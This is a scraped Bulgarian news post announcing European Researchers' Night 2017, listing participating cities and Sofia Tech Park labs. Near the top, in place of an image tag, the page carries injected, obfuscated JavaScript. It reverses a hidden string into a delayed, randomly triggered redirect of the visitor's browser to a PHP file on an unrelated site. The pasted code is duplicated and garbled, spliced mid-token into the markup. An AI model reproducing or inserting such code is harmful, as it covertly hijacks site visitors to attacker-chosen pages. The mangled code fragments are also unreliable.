Европейска нощ на учените 2017

September 20, 2017 in ОТТ Новини

Европейската нощ на учените е мега събитие, което всяка година се провежда едновременно в около 300 града в цяла Европа и по света.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2017/09/sofiatechpark_pic1.jpg">sofiatechpark_pic$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2017/09/sofiatechpark_pic1-300x212.jpg" width="300" height="212" />

30 научно-изследователски центрове и музеи в 14 града в България ще се включат в Европейската нощ на учените и този петък (30 септември) ще отворят врати, за да демонстрират постиженията си. Инициативата всяка година се провежда едновременно в повече от 300 града в цяла Европа и цели да подобри общественото разбиране за науката и да повиши ангажираността й към проблемите на обществото Десетата Европейска нощ на учените в България ще се проведе на повече места отвсякога. Мащабната програма в нощта на 30 септември (петък) включва събития в София, Пловдив, Варна, Бургас, Русе, Плевен, Стара Загора, Благоевград, Сливен, Габрово, Котел, Жеравна, Медвен и Рожен. Само в София програмата ще се проведе паралелно в 7 локации в града – София Тех Парк, Технически университет, Софийска астрономическа обсерватория, Биологически факултет на СУ, Национален природонаучен музей, Национален политехнически музей и Музейко. Лабораториите на София Тех Парк за първи път отварят врати за любопитните да видят отвътре първия научно-технологичен парк в България. Посетителите ще могат да се включат в обиколки и събития в лабораториите: Киберсигурност, Интелигентни комуникационни системи, Биоинфотех и Бързо прототипиране. Другата изненада, която ще очаква посетителите на територията на София Тех Парк, е Експериментариумът. Това е мястото, където ще бъде публичната зона за експерименти и демонстрации за всички любители на науката и до него се стига по новопостроения пешеходен мост над бул. "Цариградско шосе".

Прочети още тук